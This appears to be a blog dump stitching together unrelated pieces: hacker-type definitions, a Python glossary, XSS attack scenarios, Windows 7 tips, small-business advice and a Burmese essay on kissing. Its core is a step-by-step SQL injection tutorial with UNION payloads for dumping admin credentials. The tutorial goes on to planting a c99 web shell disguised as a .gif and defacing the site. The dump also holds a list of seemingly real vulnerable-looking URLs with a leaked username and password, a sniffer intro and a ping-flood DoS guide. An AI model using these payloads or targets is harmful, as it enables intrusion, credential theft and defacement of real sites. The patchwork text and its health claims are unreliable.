The “good guys,” often security professionals, are called White Hat hackers.They stay entirely within the law, only access systems with permission, and work to identify and fix security flaws. If they find security problems of a particular product, they inform the vendor so that it can be fixed. They do not publicize the problem.

White Hat hackers often work as security professionals, using the hacker tools to test the security on their own systems. They also closely monitor Internet resources that discuss hacking, vulnerabilities, and attacks. They may also attend hacker conventions and subscribe to hacker publications. Like an undercover police officer, they sometimes walk a fine line.

Samurai hackers are White Hat hackers that consult as security professionals. They are usually privy to the highest level of access and have an in-depth knowledge of a company’s security vulnerabilities, and consequently, they must have extremely high ethical standards. Some companies hire reformed hackers who gained their knowledge in less reputable activities. This is the equivalent of hiring an ex-burglar as a physical security expert and is a risky practice.

THE ETHICAL OR GRAY HAT HACKER

Hackers who find security holes and report them are known as Ethical or Gray Hat hackers. Sometimes they give the company a chance to fix the problem before publicly posting it. Others do not; they immediately publish the problem, allowing malicious hackers the opportunity to exploit it. Many also break into systems without permission. They believe they are providing a service to consumers by forcing companies to provide better security and products.

Tom Cervenka considers himself an Ethical hacker. He discovered a weakness in eBay’s security that allows the theft of users’ identities. He claims he notified their tech support and that they failed to act.He then publicly posted a step-by-step guide to exploiting the weakness on the Internet. He feels his actions are justifiable because it forced the company to act. eBay feels differently about this being an “ethical” act.

An attack by an Ethical hacker is obviously better than one by someone with malicious intent. However, when you are under attack it is impossible to tell the intent until it is too late. Therefore, the IT  resources must scramble to protect information and record the attack as if it was malicious. If the press reports the attack, public confidence is undermined, especially if the organization deals with financial or confidential information. The public may be relieved the attack was benign but this may not stop them from moving their business to a company with a better security record.

The Script Kiddy

Unskilled hackers who use tools written by more experienced hackers are called Script Kiddies. They are typically teenagers seeking the thrill of publicity. They may gain access to systems, disrupt systems, or deface web pages. They are easier to detect and catch but their attacks can still be very damaging. It can be very embarrassing for a company to have their security thwarted by a 14-year-old boy on his Dad’s old 486 PC. Script Kiddies have a great deal of free time, often work in groups, and make great headlines.

In the first quarter of 2000, major online companies including CNN, Amazon, Yahoo!, Excite, and eBay experienced Denial of Service attacks. These attacks sent huge amounts of traffic to the websites until they could no longer handle the volume. Regular customers experienced a denial of service when they attempted to conduct legitimate business on the website. Ironically, the alleged perpetrator, alias Mafiaboy, was a 15-year-old Canadian Script Kiddy.

high-level language: A programming language like Python that is designed to be easy for humans
to read and write.

low-level language: A programming language that is designed to be easy for a computer to execute;
also called “machine language” or “assembly language.”

portability: A property of a program that can run on more than one kind of computer.

interpret: To execute a program in a high-level language by translating it one line at a time.

compile: To translate a program written in a high-level language into a low-level language all at
once, in preparation for later execution.

source code: A program in a high-level language before being compiled.

object code: The output of the compiler after it translates the program.

executable: Another name for object code that is ready to be executed.

prompt: Characters displayed by the interpreter to indicate that it is ready to take input from the
user.

script: A program stored in a file (usually one that will be interpreted).

interactive mode: A way of using the Python interpreter by typing commands and expressions at
the prompt.

script mode: A way of using the Python interpreter to read and execute statements in a script.

program: A set of instructions that specifies a computation.

algorithm: A general process for solving a category of problems.

bug: An error in a program.

debugging: The process of finding and removing any of the three kinds of programming errors.

syntax: The structure of a program.

syntax error: An error in a program that makes it impossible to parse (and therefore impossible to
interpret).

exception: An error that is detected while the program is running.
semantics: The meaning of a program.

semantic error: An error in a program that makes it do something other than what the programmer
intended.

natural language: Any one of the languages that people speak that evolved naturally.

formal language: Any one of the languages that people have designed for specific purposes, such
as representing mathematical ideas or computer programs; all programming languages are
formal languages.

token: One of the basic elements of the syntactic structure of a program, analogous to a word in a
natural language.

parse: To examine a program and analyze the syntactic structure.

print statement: An instruction that causes the Python interpreter to display a value on the screen.

Attackers intending to exploit cross-site scripting vulnerabilities must approach each class of vulnerability differently. For each class, a specific attack vector is described here. (The names below come from the cast of characters commonly used in computer security.)

Type-0 attack

1. Mallory sends a URL to Alice (via email or another mechanism) of a maliciously constructed web page.
2. Alice clicks on the link.
3. The malicious web page’s JavaScript opens a vulnerable HTML page installed locally on Alice’s computer.
4. The vulnerable HTML page contains JavaScript which executes in Alice’s computer’s local zone.
5. Mallory’s malicious script now may run commands with the privileges Alice holds on her own computer.

Type-1 attack

1. Alice often visits a particular website, which is hosted by Bob. Bob’s website allows Alice to log in with a username/password pair and store sensitive information, such as billing information.
2. Mallory observes that Bob’s website contains a reflected XSS vulnerability.
3. Mallory crafts a URL to exploit the vulnerability, and sends Alice an email, making it look as if it came from Bob (ie. the email is spoofed).
4. Alice visits the URL provided by Mallory while logged into Bob’s website.
5. The malicious script embedded in the URL executes in Alice’s browser, as if it came directly from Bob’s server. The script steals sensitive information (authentication credentials, billing info, etc) and sends this to Mallory’s web server without Alice’s knowledge.

Type-2 attack

1. Bob hosts a web site which allows users to post messages and other content to the site for later viewing by other members.
2. Mallory notices that Bob’s website is vulnerable to a type 2 XSS attack.
3. Mallory posts a message, controversial in nature, which may encourage many other users of the site to view it.
4. Upon merely viewing the posted message, site users’ session cookies or other credentials could be taken and sent to Mallory’s webserver without their knowledge.
5. Later, Mallory logs in as other site users and posts messages on their behalf….

http://www.vx10.co.uk/blog.php?Id=5

username : shahmirj

passwd      : 25826429

http://www.genhound.co.uk/source.php?id=477

http://www.lcoastpress.com/journal.php?id=8

http://www.travellers-tales.co.uk/travelJournal.php?id=42

http://www.arrowvalves.co.uk/content.php?id=8

http://www.reaplasrack.co.uk/content.php?id=129

http://www.arrowvalves.co.uk/content.php?id=28

http://www.woodlandsschool.org/content.php?id=1&text=

http://www.qwc.org.uk/projects.php?ID=1

http://www.readingmatters.co.uk/author.php?id=12

http://www.readingmatters.co.uk/author.php?id=56

1) FINDING THE TARGET AND GETTING THE ADMIN PASSWORD

First we must find our target website to do that you can use this “dorks”.
I’ll give some dorks here copy anyone of it and paste it in google and search.

you can find lots of dorks here..(use them without the ” ” marks)

1). Check for vulnerability

Let’s say that we have some site like this

http://www.site.com/news.php?id=5

Now to test if is vulrnable we add to the end of url ‘ (quote),

and that would be http://www.site.com/news.php?id=5′

so if we get some error like
“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc…”
or something similar

that means is vulrnable to sql injection

2). Find the number of columns

To find number of columns we use statement ORDER BY (tells database how to order the result)

so how to use it? Well just incrementing the number until we get an error.

http://www.site.com/news.php?id=5 order by 1/* <– no error

http://www.site.com/news.php?id=5 order by 2/* <– no error

http://www.site.com/news.php?id=5 order by 3/* <– no error

http://www.site.com/news.php?id=5 order by 4/* <– error (we get message like this Unknown column ’4′ in ‘order clause’ or something like that)

that means that the it has 3 columns, cause we got an error on 4.

3). Check for UNION function

With union we can select more data in one sql statement.

so we have

http://www.site.com/news.php?id=5 union all select 1,2,3/* (we already found that number of columns are 3 in section 2). )

if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works

4). Check for MySQL version

http://www.site.com/news.php?id=5 union all select 1,2,3/* NOTE: if /* not working or you get some error, then try –
it’s a comment and it’s important for our query to work properly.

let say that we have number 2 on the screen, now to check for version
we replace the number 2 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar.

it should look like this http://www.site.com/news.php?id=5 union all select 1,@@version,3/*

if you get an error “union + illegal mix of collations (IMPLICIT + COERCIBLE) …”

i didn’t see any paper covering this problem, so i must write it

what we need is convert() function

i.e.

http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*

or with hex() and unhex()

i.e.

http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*

and you will get MySQL version

5). Getting table and column name

well if the MySQL version is < 5 (i.e 4.1.33, 4.1.12…) <— later i will describe for MySQL > 5 version.
we must guess table and column name in most cases.

common table names are: user/s, admin/s, member/s …

common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc…

i.e would be

http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that’s good )

we know that table admin exists…

now to check column names.

http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* (if you get an error, then try the other column name)

we get username displayed on screen, example would be admin, or superadmin etc…

now to check if column password exists

http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* (if you get an error, then try the other column name)

we seen password on the screen in hash or plain-text, it depends of how the database is set up

i.e md5 hash, mysql hash, sha1…

now we must complete query to look nice

for that we can use concat() function (it joins strings)

i.e

http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*

Note that i put 0x3a, its hex value for : (so 0x3a is hex value for colon)

(there is another way for that, char(58), ascii value for : )

http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*

now we get dislayed username:password on screen, i.e admin:admin or admin:somehash

when you have this, you can login like admin or some superuser

if can’t guess the right table name, you can always try mysql.user (default)

it has user i password columns, so example would be

http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*

6). MySQL 5

Like i said before i’m gonna explain how to get table and column names
in MySQL > 5.

For this we need information_schema. It holds all tables and columns in database.

to get tables we use table_name and information_schema.tables.

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*

here we replace the our number 2 with table_name to get the first table from information_schema.tables

displayed on the screen. Now we must add LIMIT to the end of query to list out all tables.

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*

note that i put 0,1 (get 1 result starting from the 0th)

now to view the second table, we change limit 0,1 to limit 1,1

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*

the second table is displayed.

for third table we put limit 2,1

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*

keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etc…

To get the column names the method is the same.

here we use column_name and information_schema.columns

the method is same as above so example would be

http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*

the first column is diplayed.

the second one (we change limit 0,1 to limit 1,1)

ie.

http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*

the second column is displayed, so keep incrementing until you get something like

username,user,login, password, pass, passwd etc…

if you wanna display column names for specific table use this query. (where clause)

let’s say that we found table users.

i.e

http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name=’users’/*

now we get displayed column name in table users. Just using LIMIT we can list all columns in table users.

Note that this won’t work if the magic quotes is ON.

let’s say that we found colums user, pass and email.

now to complete query to put them all together

for that we use concat() , i decribe it earlier.

i.e

http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/*

what we get here is user:pass:email from table users.

example: admin:hash:whatever@blabla.com

** if you are too lazy for doing above stuff you can use tools they will do all the job:
1) Exploit scanner (this will find vulnerable websites)

2) SQLi helpper (this tool will do all the injecting job and get you the pass or hash)

*** use the tools only if you are new to hacking. Do it manually thatsthe thrill and that is real hacking. When you do it manually you willunderstand the concept.

in some websites you can directly see the password. but most of thewebsites encrypt them using MD5. so u hav to crack the hash to get thepassword. to crack the password there are three ways
1) check the net whether this hash is cracked before:

2) crack the password with the help of a site:

3) use a MD5 cracking software:

2) DEFACING THE WEBSITE

after getting the password you can login as the admin of the site. Butfirst you have to find the admin login page for the site. there r threemethods to find the admin panel.
1) you can use an admin finder website:

2) you can use an admin finder software:

after logging in as the admin you can upload photos to the site. so nowyou are going to upload a shell into the site using this uploadfacility.

dowload the shell here(shells are php scripts which affects websites soit will be detected as trojans but no need to worry i take theresponsibility):

extract it you will get a c99.php upload it.
some sites wont allow you to upload a php file. so rename it as c99.php.gif
then upload it.

after that go to http://www.site.com/images (in most sites images are saved in this dir but if you cant find c99 there then you have to guess the dir)
find the c99.php.gif and click it..
now you can see a big control pannel….
now you can do what ever you want to do…
search for the index.html file and replace it with your own file. so if any one goes to that site they will see your page….

Here we are going to learn How To Hack a Wireless Network and Grab the Passwords of their mail’s Telnet sessions,FTP,HTTP and many more things.This is called “Man in the Middle Attack” .Man in the middle attack has been done by the help of a Sniffer .To day we are going Learn How to Implement a Sniffer in the LAN and Grab the Passwords and other information.Remember it is a Direct Hacking method.

First of all we need learn about What is sniffer ?.Sniffer is Tool which is used in Data Theft and Grabbing the private  information.For example in a Local LAN or WLAN, if we can implement a Sniffer on the LOCAL Gateway.Then you are ready to get all the traffic information including passwords,chats, ftp ,telnet sessions and many more things.

Please before going further,don’t implement these techniques on Public Network,always prefer to use LOCAL LAN’s or WLAN’s.And also don not use this Hacking Techniques anywhere for Commercial or illegal activities.This is only for Educational Purpose.

Tools To Implement a Sniffer on the Local LAN or WLAN :

To implement Man in the Middle attack we need some Applications like sniffer Tool, Packet analyzer, Network identifier.To get this Tools see the bellow list and Download the Applications from there.

1) Nmap      –  You can Download this from  nmap.org
2) Cain        –  It is a Sniffer tool with Lots of Scripts and Options.You can download this from www.oxid.it/cain.html.
3) Wireshark Network Analyzer     –  Network Packet Analyzer : Download at  http://www.wireshark.org/download.html .

After downloading these applications you are ready to Hack your LAN or WLAN.In this tutorial we are majorly using Cain-Sniffer.

This is just a little tutorial on how to find a website’s IP address and DoS them using only CMD. What is a Denial of Service Attack? Basically all this is does is floods of a network to prevent its operation
disruption of connections between two machines, preventing access to a particular service
Obstruction of access to a service to a particular person.
This is how it works.

**For educational purposes only**

Okay first off we need to get the website’s IP address, we can do this by typing this in cmd: ping ( the url )

for example : ping http://www.google.com

Once you’ve got the website’s IP address you need to follow these simple steps below.

Tut:

1. Open CMD by going into run and typing CMD

2. Get the IP of the site you wish to DoS, in this case we are using this : 59.12.182.71(random IP)

3. So you would type this in ur CMD: ping 46.17.100.40 -t -l 14000 (The higher the longer & The more damage done)

4. You have sucesfully DoS’d ur target! just alow it to finish (may take a while).

*Note*
This will not work if your host is weak. Also it takes multiple people to do this most of the time.

It doesn’t DoS very hard depending on your own connection, But it’s fun to play around with and if you can get multiple people to do it at once you might achieve an outcome you didn’t expect =)

As the local PC guru you’re probably very used to friends and family asking for help with their computer problems, yet having no idea how to clearly describe what’s going on. It’s frustrating, but Microsoft feels your pain, and Windows 7 will include an excellent new solution in the Problem Steps Recorder.

When any app starts misbehaving under Windows 7 then all your friends need do is click Start, type PSR and press Enter, then click Start Record. If they then work through whatever they’re doing then the Problem Steps Recorder will record every click and keypress, take screen grabs, and package everything up into a single zipped MHTML file when they’re finished, ready for emailing to you. It’s quick, easy and effective, and will save you hours of troubleshooting time.

2. Calculate more

At first glance the Windows 7 calculator looks just like Vista’s version, but explore the Mode menu and you’ll see powerful new Statistics and Programmer views. And if you’re clueless about bitwise manipulation, then try the Options menu instead. This offers many different unit conversions (length, weight, volume and more), date calculations (how many days between two dates?), and spreadsheet-type templates to help you calculate vehicle mileage, mortgage rates and more.

Don’t take any Windows 7 applet at face value, then – there are some very powerful new features hidden in the background. Be sure to explore every option in all Windows applets to ensure you don’t miss anything important.

3. Calibrate your screen

The colours you see on your screen will vary depending on your monitor, graphics cards settings, lighting and more, yet most people use the same default Windows colour profile. And that means a digital photo you think looks perfect might appear very poor to everybody else. Fortunately Windows 7 now provides a Display Colour Calibration Wizard that helps you properly set up your brightness, contrast and colour settings, and a ClearType tuner to ensure text is crisp and sharp. Click Start, type DCCW and press Enter to give it a try.

4. Enable virtual Wi-Fi

Windows 7 includes a little-known new feature called Virtual Wi-Fi, which effectively turns your PC or laptop into a software-based router. Any other Wi-Fi-enabled devices within range – a desktop, laptop, an iPod perhaps – will “see” you as a new network and, once logged on, immediately be able to share your internet connection.

This will only work if your wireless adapter driver supports it, though, and not all do. Check with your adapter manufacturer and make sure you’ve installed the very latest drivers to give you the best chance.

Once you have driver support then the easiest approach is to get a network tool that can set up virtual Wi-Fi for you. Virtual Router (below) is free, easy to use and should have you sharing your internet connection very quickly.

5. Customise the log-on screen

use a free tweaking tool to handle everything for you. Logon Changer displays a preview so you can see how the log-on screen will look without rebooting, while the Logon Screen Rotator accepts multiple images and will display a different one every time you log on.

http://tweaks.com/software/tweakslogon/

http://www.lukepaynesoftware.com/lsrotator/

6.Browse your tasks

If you prefer the keyboard over the mouse, you will love browsing the taskbar using this nifty shortcut. Press Windows and T, and you move the focus to the left-most icon on the taskbar. Then use your arrow keys to change the focus to other icons, and you get a live preview of every window.

7. Protect your data

If you have confidential files in a particular folder or two, and would like to keep them away from other network users, then right-click the folder, select Share With > Nobody, and they’ll be made private, for your eyes only (or your user account, anyway).

8. Keyboard shortcuts

Windows 7 supports several useful new keyboard shortcuts.

Alt+P
Display/ hide the Explorer preview pane

Windows Logo+G
Display gadgets in front of other windows

Windows Logo++ (plus key)
Zoom in, where appropriate

Windows Logo+- (minus key)
Zoom out, where appropriate

Windows Logo+Up
Maximise the current window

Windows Logo+Down
Minimise the current window

Windows Logo+Left
Snap to the left hand side of the screen

Windows Logo+Right
Snap to the right hand side of the screen

Windows Logo+Home
Minimise/ restore everything except the current window

1. Save up as much money as possible before starting

2. Don’t hire employees until you can keep them busy.

4. Understand how — and if — you will make a profit.
You should be able to state in just a few sentences how your business plans to make a substantial profit.

5. Make a business plan, no matter how short.

6. Get and keep a competitive edge.
being able to produce or distribute your product more efficiently,
having a better location, or offering superior customer service.

7. Put all agreements in writing.
The laws of your state require you to put some contracts and agreements in writing:

* Contracts that will last longer than a year.
* Contracts that involve the sale of goods worth $500 or more.
* Contracts that transfer the ownership of copyrights or real estate.

8. Hire and keep good people.
Your goal should be to hire and retain truly excellent employees

9. Pay attention to your workers

* The worker works full-time or nearly full-time for you.
* The worker doesn’t work for anyone else.
* The worker provides services that are an integral part of your operations.
* You control how the worker does the job and provide detailed instructions and training for the worker.

10. Pay your bills early and your taxes on time.

Controllable Expenses:

(expenses that generally vary with your sales volume)

* Salaries/wages: base pay plus overtime
* Benefits: paid vacations, sick leave, health insurance, unemployment insurance, social security taxes
* Legal/accounting: outside professional services
* Advertising: include advertising expenses by type — e.g., yellow pages, radio, brochures, TV
* Automobile: charge if personal car is used in business, including parking, tools, buying trips
* Office Supplies: services and items purchased for use in the business
* Dues/subscriptions: include Chamber of Commerce dues, professional society dues, etc.
* Utilities: electric, gas, water, telephone, etc.
* Taxes: include real estate taxes, personal property taxes, excise taxes, etc.
* Repairs & maint.: regular maintenance /repair, including periodic large expenditures like painting
* Miscellaneous: small items not belonging in any of the other categories

Fixed Expenses:

(expenses that will be incurred whether you have any sales or not)

* Rent: list only real estate used in business
* Depreciation: amortization of capital assets
* Utilities: electric, gas, water, telephone, etc.
* Insurance: fire or liability on property or products. Include workers’ compensation here.
* Licenses/permits: county business licenses, liquor licenses, building permits, etc.
* Loan payments: interest on outstanding loans
* Miscellaneous: small expenditures without separate accounts

* find a less expensive source of supplies
* do without an employee
* save rent by working out of your home, or
* sell your product or service at a higher price.

ပထမဆံုးအနမ္း ရည္းစားဦးအနမ္း ဘယ္သူကပဲ နမ္းနမ္း ဘယ္သူ႔ကို နမ္းနမ္း ၊ အနမ္းေတြဟာ ခ်ိဳျမိန္တယ္ လို႔ ေျပာခ်င္ပါတယ္ ။ ကၽြန္ေတာ္သိသေလာက္ ေျပာရရင္ ျမန္မာေတြဟာ အနမ္း အေၾကာင္း ေကာင္းေကာင္း မသိဘူး ။

ေကာင္မေလး တစ္ေယာက္ကို ဘယ္လို ကၽြမ္းက်င္စြာ နမ္းရမလဲဆိုတာ မသိၾကပါဘူး ။ အျဖဴေကာင္ေတြ ျပင္သစ္ေကာင္ေတြကေတာ႔ ဒီေနရာမွာ စာတင္ေလာက္ေအာင္ ကၽြမ္းက်င္ၾကပါတယ္ ။

ကၽြန္ေတာ္ how to kiss ဆိုတဲ႔ youtube video ေတြ ၾကည္႔ဖူးပါတယ္ ။ အီးလို နမ္းမလား ျပင္သစ္လိုနမ္းမလား ဂ်ပန္လိုနမ္းမလား ဟုတ္ကဲ႔ နမ္းနည္း အမ်ိဳးမ်ိဳးရွိတာေတာ႔ အမွန္ပဲ ။

ႏွဳတ္ခမ္းေလးနဲ႔ နမ္းမွာလား ၊ လွ်ာဖ်ားေလးနဲ႔ နမ္းမွာလား ။ အင္ … ဒီစာကို ေရးရင္းနဲ႔ ကၽြန္ေတာ္ တစ္ေယာက္ေယာက္ကို ေျပးနမ္းလိုက္ခ်င္တယ္ ဗ်ာ ။ ဒါေပမယ္႔ေပါ႔ေလ ကၽြန္ေတာ္႔မွာ နမ္းရမယ္႔ ေကာင္မေလး

မရွိဘူးဆိုတာ သိၾကလားမသိဘူး ။ ေၾကာ္ျငာ၀င္တာ မဟုတ္ပါဘူး ၊ အမွန္ေတြ ေျပာျပတာပါ ။ တစ္ခါတစ္ေလ ရည္းစားထားခ်င္ပါတယ္ ။ တစ္ခါတစ္ေလ တစ္ေယာက္ေယာက္ကို ရူးရူးမူးမူး ခ်စ္ျပစ္လိုက္ခ်င္ပါတယ္ ။

ကၽြန္ေတာ္က သူခ်စ္ကို ရွာျပီး ကိုယ္ခ်စ္ကို မရွာတဲ႔ လူစားမ်ိဳးပါ ။ ဒါေၾကာင္႔ ခ်စ္သူမရွိတဲ႔ အခ်ိန္ေတြမွာ အူေၾကာင္ေၾကာင္ ျဖစ္ေနတတ္ပါတယ္ ။

ကၽြန္ေတာ္ မေမွ်ာ္လင္႔ဘဲနဲ႔  the effect of kissing ဆိုတဲ႔ အီးလိုေရးထားတဲ႔ စာေလးကို website တစ္ခုမွာ ဖတ္မိတယ္ ။ ျပီးေတာ႔ ၾကိုက္သြားတယ္ ဆိုပါေတာ႔ အဲဒါ အခု ျပန္ေျပာျပမလို႔ ။

၁ ။ အနမ္းဟာ ေသြးလည္ပတ္မွု အားေကာင္းေစပါတယ္ ။ နမ္းေနၾကတဲ႔ အခ်ိန္မွာ ႏွလံုးခုန္ႏွဳန္းဟာ တစ္မိနစ္ကို ၁၁၀ အထိေလာက္ တက္လာတတ္ပါတယ္ ။ အဲဒါေၾကာင္႔ သူတို႔က အနမ္းကို ေသြးလည္ပတ္မွဳ ေကာင္းေစတဲ႔ ေလ႔က်င္႔ခန္း တစ္ခုလို႔ ယူဆၾကပါတယ္ ။

၂ ။ နမ္းျပီးသြားတဲ႔ ေနာက္ပိုင္းမွာ အစာအိမ္ဟာ အလုပ္ပိုလုပ္ရပါတယ္ ။ ပံုမွန္ အသက္ရူရွိုက္ခ်ိန္ဟာ တစ္မိနစ္ကို ၂၀ ကေန ၆၀ ေလာက္အထိ ျဖစ္လာပါတယ္ ။ ဒီလို အသက္ရူပံုမ်ိဳးဟာ အဆုပ္ နဲဲဲ႔ဆိုင္တဲ႔ ေရာဂါေတြ

မျဖစ္ေအာင္ ကာကြယ္ ေပးပါတယ္တဲ႔ ဗ်ာ ။

၃ ။ Dentists လို႔ေခၚတဲ႔ သြားဆရာ၀န္ေတြကလဲ အနမ္းဟာ သြားေတြ ယိုယြင္းပ်က္စီးမွုေတြကို ကာကြယ္ေပးနိုင္တယ္လို႔ ယံုၾကည္ၾကပါတယ္ ။ သြားေဆးခန္းကို သြားျပီး အေသးစိပ္ ေမးျမန္း ၾကည္႔ပါ ။

၄ ။ သံုးမိနစ္ထက္ပိုကဲတဲ႔ အနမ္းေတြဟာ စိုးရိမ္ပူပန္မွု စိတ္ပင္ပန္းမွု stress ေတြကို ေျပေပ်ာက္ေစပါတယ္ ။ ဒါဆိိုရင္ေတာ႔ ရည္းစား အျမန္ထားမွ ျဖစ္ေတာ႔မယ္ ။

၅ ။ ကိုယ္ခ်စ္ခင္ရသူနဲ႔ မနက္တိုင္း အနမ္းေတြ ဖလွယ္ၾကျခင္းဟာ မနမ္းၾကသူေတြထက္ အသက္ ငါးႏွစ္ ပိုရွည္ေစပါတယ္ ။

၆ ။ အနမ္း ဟာ ကိုယ္႔ကိုကိုယ္ ယံုၾကည္မွု ၊ တန္ဖိုးထားမွု နဲ႔ ကိုယ္႔စိတ္ကို ေပ်ာ္ရႊင္ေစမွု ေတြကို ျဖစ္ေပၚေစပါတယ္ ။

ရ ။ သုေတသနပညာရွင္ေျပာၾကတာက တစ္ေန႔မွာ သံုးၾကိမ္ေလာက္ စိတ္အားတက္ၾကြစြာ နမး္္ျခင္းဟာ (အနည္းဆံုး စကၠန္႔ ၂၀ ေလာက္ရွိရမယ္) ၀ိတ္က်ေစပါတယ္ ။ ဘာျဖစ္လို႔လဲဆိုေတာ႔ အနမ္းဟာ calories ေတြကို ေလာင္းကၽြမ္း ေစပါတယ္ ။

၈ ။ အနမ္းေပးဖို႔အတြက္ မ်က္ႏွာမွာရွိတဲ႔ muscles ေပါင္း ၃၀ အလုပ္လုပ္ရပါတယ္ ။ ဒါေၾကာင္႔ မ်က္ႏွာ အရည္ပ်ားေလ်ာ႔တြဲက်ျခင္းကို ကာကြယ္ေပးျပီး facial muscles ေတြကို တင္းရင္း ေစပါတယ္ ။

ထို႔အျပင္ အနမ္းဟာ အသားအရည္ကို ေခ်ာေမြ႔ေစပါတယ္ ။ ဒါဆိုရင္ facial mask , day cream & night cream ေတြ ၀ယ္သံုးစရာ မလိုေတာ႔ဘူးေပါ႔ေနာ္ ။ ကုန္က်စရိတ္ သက္သာေစတာေပါ႔ ။ ဂြတ္ ေကာင္း ဗ်ာ႔ ။

၉ ။ အနမ္းဟာ ႏွလံုး အတြက္ ေကာင္းတယ္ဆိုတာ သိပါသလား ။ နမ္းေနတဲ႔ အခ်ိန္မွာ ရင္ေတြ တအားခုန္ေနတာ ႏွလံုးနဲ႔ ဆိုင္တဲ႔ ေသြးျပန္ေၾကာ ေသြးလြတ္ေၾကာေတြ ေကာင္းေကာင္း အလုပ္လုပ္ေနလို႔ေပါ႔ ။

သိပၸံနည္းက်က် ေျပာရမယ္ ဆိုရင္ မၾကာခဏ နမ္းျခင္းဟာ blood pressure နဲ႔ cholesterol ေတြကို က်ေစပါတယ္ ။

၁၀ ။ ဒါေၾကာင္႔ မၾကာ မၾကာ နမ္းၾကပါ မ်ားမ်ား နမ္း ပါ ။ အနမ္း ဟာ the key to happiness ျဖစ္တယ္ ၊ အနမ္းဟာ a feeling of pease ကို ျဖစ္ေပၚေစတယ္ ။

တကယ္လို႔ မင္းမယံုဘူးဆိုရင္ အနမ္းဘုရင္မ လြမ္းထားထား ကို သြားေမးၾကည္႔ပါ ။

တကယ္လို႔ မင္းသိခ်င္ေသးတယ္ဆိုရင္ ရန္ကုန္ျမို႔ အင္းယားကန္ မွာ ခ်စ္ေနၾကတဲ႔ ခ်စ္သူေတြကို သြားေမးၾကည္႔ပါ ။

အနမ္းဟာ ေကာင္းလား မေကာင္းဘူးလား ေမးရင္ “ေကာင္းပါတယ္” ဆိုတဲ႔ အေျဖကိုသာ မင္းၾကားရလိမ္႔မယ္ ။ကမၻာမွာ ခ်စ္သူမ်ားေန႔ပဲ ရွိတယ္ ။ အနမ္းေန႔ဆိုတာ မရိွေသးဘူး ။ အနမ္းေန႔ဆိုတာ ရွိဖို႔လိုအပ္တာေပါ႔ ။ ဒါဟာ ကြက္လပ္တစ္ခု ျဖစ္ေနတယ္ ။ အနမ္းေတြ ဖြံျဖိဳးတိုးတက္ဖို႔လိုတယ္ ။

အနမ္းေန႔မွာ ရံုးေတြအားလံုး ပိတ္ရမယ္ ။ ခ်စ္သူအားလံုး လူၾကီးလူငယ္အားလံုး ကေလးေတြအားလံုး နမ္းၾကရမယ္ ။ ဒီအၾကံေပးခ်က္ကို ကုလသမဂၢ လူၾကီးေတြ သိဖို႔လိုအပ္တယ္ ။

ဘာျဖစ္လို႔လဲဆိုေတာ႔ ျငိမ္းခ်မ္းေရးဆိုတာ အနမ္းက စတယ္ဆိုတာ ဒီလူေတြ မသိၾကဘူး ။

ရန္ကုန္ျမိဳ႕မွာ ဘာသင္တန္း ညာသင္တန္း နဲ႔ အလကား သင္တန္းေတြတာ ေပါမ်ားပါတယ္ ။ အနမ္းေက်ာင္းရယ္လို႔ မရွိဘူး ။ Diploman in Kissing ဆိုတဲ႔ Subject ကို ျပဠာန္း မထားဘူး ။

ျမန္မာလူမ်ိဳးေတြက ရွက္တတ္တယ္ ။ အနမ္းအေၾကာင္းေျပာရင္ ရယ္မယ္ ။ အဲဒါ ဂုဏ္ယူစရာလို႔ ထင္ေနရင္မွားမယ္ ။ ျမန္မာ လူမ်ိဳးေတြ မဖြံျဖိုးမတိုးတက္ရတဲ႔ အေၾကာင္းရင္းတစ္ခုဟာ မနမ္းၾကလို႔ ျဖစ္တယ္ ။

အနမ္းနဲ႔ ပတ္သက္တဲ႔ သင္တန္းေက်ာင္းေတြ ရွိရမယ္ ။ အနမ္းအေၾကာင္းေရးထားတဲ႔ စာအုပ္ေတြရွိရမယ္ ။ အခ်စ္ကို ခိုင္ျမဲေစေသာ အရာ တစ္ခုဟာ အနမ္းျဖစ္တယ္ ဆိုတာ လူေတြ သေဘာမေပါက္ေသးဘူး ။

ျမန္မာေတြဟာ ခ်စ္တယ္ဆိိုတဲ႔စကားကို ႏွုတ္ခမ္းက ေျပာတယ္ ၊ စာနဲ႔ေရးတယ္ ။ ဒါေပမယ္႔ ခ်စ္သူကို နမ္းဖို႔ၾကေတာ႔ တြန္႔ဆုတ္ေနၾကတယ္ ။ ေန႔ေရြ႕ ညေရြ႕ လုပ္ေနတယ္ ။ အဲလိုနဲ႔ ၃ လ ၆ လ ေလာက္နဲ႔ ပ်က္သြားၾကတဲ႔ အတြဲေတြ မနည္းဘူး ။

အာဖဂန္နစၥတန္ အစည္းအေ၀း ၊ သဘာ၀ေဘးအႏၱရယ္ကာကြယ္ေရး အစည္းအေ၀း စတဲ႔ အ၇ည္မရ အဖတ္မရတဲ႔ အေၾကာင္းေတြကို လူေတြက ေတာ္ေတာ္ စိတ္၀င္စားပံုရတယ္ ။ ဒီကမၻာမွာ သဘာ၀ေဘးေတြကို

